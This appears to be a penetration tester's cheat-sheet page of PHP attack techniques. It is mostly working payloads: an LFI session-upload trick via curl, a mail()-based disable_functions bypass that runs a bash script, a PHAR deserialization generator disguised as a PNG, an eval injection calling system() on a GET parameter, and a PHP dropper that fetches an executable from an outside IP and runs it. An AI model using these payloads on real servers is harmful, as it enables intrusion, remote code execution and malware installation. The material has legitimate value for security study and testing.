xct's notes
Search…
PHP

Dangerous Functions

PHP Temporary Files

PHP will create temporary files for files send with POST and for sessions. If we have a LFI we can get our php code onto the box and then include these.

PHP_SESSION_UPLOAD_PROGRESS (will create sess_xct in /tmp):

1
curl --path-as-is '127.0.0.1/' -F 'PHP_SESSION_UPLOAD_PROGRESS=<payload' -F '[email protected]' -H 'Cookie: PHPSESSID=xct';
Copied!

Disable Functions Bypass

Mail

1
<?php
2
file_put_contents('/tmp/exploit',"whoami>/tmp/output");
3
mail("a","b","c","d","-H 'bash /tmp/exploit'");
4
?>
Copied!

PHP7 Backtrace

Interesting Behavior

PHP's REQUEST takes values from GET, POST and also COOKIE. This can lead to some interesting behavior by setting GET/POST and COOKIE parameters to different values. Values from COOKIE are disabled by default though.

PHAR SSRF

If we have a file_exists or similar method on uploaded content, we can request via phar:// wrapper. This allows to use deserialization gadgets.
1
function generate_base_phar($o, $prefix){
2
global $tempname;
3
@unlink($tempname);
4
$phar = new Phar($tempname);
5
$phar->startBuffering();
6
$phar->addFromString("test.txt", "$prefix xct_was_here");
7
$phar->setStub("$prefix<?php __HALT_COMPILER(); ?>");
8
$phar->setMetadata($o);
9
$phar->stopBuffering();
10
$basecontent = file_get_contents($tempname);
11
@unlink($tempname);
12
return $basecontent;
13
}
14
15
$object = new <Your Class>;
16
var_dump(serialize($object));
17
18
# prefix for faking a valid png
19
$prefix = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x05\x0a\x00\x00\x01\x56";
20
$tempname = 'temp.phar'; // make it phar
21
$outfile = 'out.png';
22
file_put_contents($outfile, generate_base_phar($object, $prefix));
Copied!
If no good gadgets are available SoapClient can be used to SSRF via gopher to other local services like MySQL.

Eval Code Injection

Simple but effective:
1
${system($_GET[1])}&1=ls
Copied!

Upload & Execute File

1
<?php
2
$data = file_get_contents("http://10.10.14.51/xc.exe");
3
file_put_contents( "C:\\programdata\\xc_10.10.14.51_8080.exe", $data);
4
system("C:\\programdata\\xc_10.10.14.51_8080.exe");
5
?>
Copied!
Last modified 6mo ago